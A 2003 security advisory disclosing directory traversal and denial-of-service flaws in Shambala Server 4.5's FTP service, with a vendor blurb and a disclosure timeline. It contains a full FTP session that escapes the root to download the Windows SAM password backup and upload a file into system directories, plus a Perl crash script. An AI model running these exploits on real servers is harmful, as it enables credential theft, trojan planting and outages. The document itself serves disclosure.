Multible vulnerabilities found in
                        Shambala Server version 4.5
                               (FTP Service)
                                                         
                           Discovered by Dennis Rand
                            www.Infowarfare.dk
------------------------------------------------------------------------

SUMMARY

Shambala is an easy to use communications server featuring the ability to
serve and access web sites, ftp sites, and chat rooms.
Using Shambala, you can quickly create a web site and host it from any PC.
Shambala doesn't require NT and its installation is non-invasive.
Shambala features a WYSIWYG DHTML editor for placing text and props on your
web pages.
The editor includes a navigation feature that allows you to express your web
site as a
geographical area and allow your users to move easily between areas. This
feature also
exists in the editor so you can create a space quickly without worrying about
maintaining hyperlinks between areas. Shambala is drag and drop based allowing
you
to perfectly size and position your web page elements.
You can use a page you are editing as an interactive whiteboard and chat
space.
When you move a prop or edit text, people connected to your workspace will
receive
the change that you make. Their workspace is automatically updated to be a
mirror
image of yours. If any machine in the group decides to leave, nothing is lost
since
each subscriber receives a full copy of the web page document being used as a
workspace.
This powerful feature can be used for interactive classrooms, games,
demonstrations,
even internet based group workshops.
To transfer files, Shambala has an integrated ftp client and ftp server. The
ftp server
provides high performance access to shared files. You can also manage the
security of the
ftp site. The client can browse, download, and upload files to any ftp server.
It can even automatically download everything on a remote ftp site.
Shambala pushes the envelope of what you can do with web technology. It
supports
the existing infrastructure of the web but also provides powerful features
that
allow you to shape the future and evolution of cyberspace.

A directory traversal vulnerability in the product allows remote attackers to
cause
the server to traverse into directories that reside outside the bounding
FTP root directory. The server is also Vulnerable for DoS attack.

DETAILS

Vulnerable systems:
 Windows NT 4.0 and Windows 2000 server fully patched
 * Shambala Server version 4.5
 
Immune systems:
 * None Shambala Will not fix any errors they don't think there is any
problems.

Shambala Server failure to filter out "\.." and "/.." sequences in specific
command requests
allowing a remote users to break out of restricted directories and gain read
access
to the system directory structure; Possibility for discovering the directory
structure outside the configured areas, It is also possible to get files from
outside
the configured areas, and the part that could be even worse is that you can
send files
to places outside the configures areas, so a trojan could be placed.

The following transcript demonstrates a sample exploitation of the
vulnerabilities:

C:\>ftp
ftp> open
To 192.168.1.199
Connected to 192.168.1.199.
220 winnt40 - Shambala FTP Server Ready.
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls
200 PORT command successful.
150 Opening data connection.
192.168.1.199
index-_-1_0_0.htm
index-_0_0_0.htm
index-_0_1_0.htm
pwd.pl
226 Transfer complete.
ftp: 78 bytes received in 0,00Seconds 78000,00Kbytes/sec.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> cd /
257 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening data connection.
192.168.1.199
index-_-1_0_0.htm
index-_0_0_0.htm
index-_0_1_0.htm
pwd.pl
226 Transfer complete.
ftp: 78 bytes received in 0,00Seconds 78000,00Kbytes/sec.
ftp> cd \..\
550 Requested action not taken. Permission denied.
ftp> ls
200 PORT command successful.
150 Opening data connection.
192.168.1.199
index-_-1_0_0.htm
index-_0_0_0.htm
index-_0_1_0.htm
pwd.pl
226 Transfer complete.
ftp: 78 bytes received in 0,01Seconds 7,80Kbytes/sec.
ftp> ls \..\..\..\..\..\..\..\..\..\..\
200 PORT command successful.
150 Opening data connection.
AUTOEXEC.BAT
CONFIG.SYS
I386
Inetpub
Installationsfiler til Windows Update
Multimedia Files
OptionPack
pagefile.sys
Program Files
pwd.pl
Shambala Server 4.5
TEMP
WINNT
226 Transfer complete.
ftp: 181 bytes received in 0,03Seconds 6,03Kbytes/sec.
ftp> ls \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\
200 PORT command successful.
150 Opening data connection.
autoexec.nt
config.nt
default._
ntuser.da_
sam._
security._
setup.log
software._
system._
226 Transfer complete.
ftp: 99 bytes received in 0,06Seconds 1,65Kbytes/sec.
ftp> get \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\sam._
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
ftp: 3196 bytes received in 0,00Seconds 3196000,00Kbytes/sec.
ftp> send pwd.pl \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\test.pl
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
ftp: 3849 bytes sent in 0,00Seconds 3849000,00Kbytes/sec.
ftp> bye
221 Goodbye.

The second attack type is a DoS attack that will kill the server application.
------------------------------------- Cut Here ------------------------------
------------
#!/usr/bin/perl
#
# Shambala Server version 4.5
# http://www.evolvable.com
# Dennis Rand - matrixinfowarfare.dk
#
# What happends when this exploit is send the server crashes
# with a error message on the server.
#
# __________________________
# | Run-time error '20127': |
# |Invalid ConnectionID |
# ----------------------------
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
#
#
use Net::FTP;

    
$target = shift() || die "usage: target ip";
my $user = "anonymous";
my $pass = "mail\mail.com";

system('cls');
print "Shambala Server version 4.5 DoS attack\n";
print "Trying to connect and destroy target system at: $target...\n";
$ftp = Net::FTP->new($target, Debug => 1, Port => 21) || die "could not
connect: $!";
$ftp->login($user, $pass) || die "could not login: $!";
$ftp->cwd("/");
$ftp->quit;
------------------------------------- Cut Here ------------------------------
------------

Detection:
Shambala Server version 4.5 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.

Vendor response:
Shambala Server version 4.xx fixes this issue. The latest version is
available from http://www.evolvable.com

Disclosure timeline:
18/11/2002 Found the Vulnerability.
19/11/2002 Author notified. Send mail to webmasterevolvable.com and
helpevolvable.com
18/01/2003 Responses received from evolvable
18/01/2003 Public Disclosure.

ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:matrixinfowarfare.dk> Dennis Rand

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.

-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]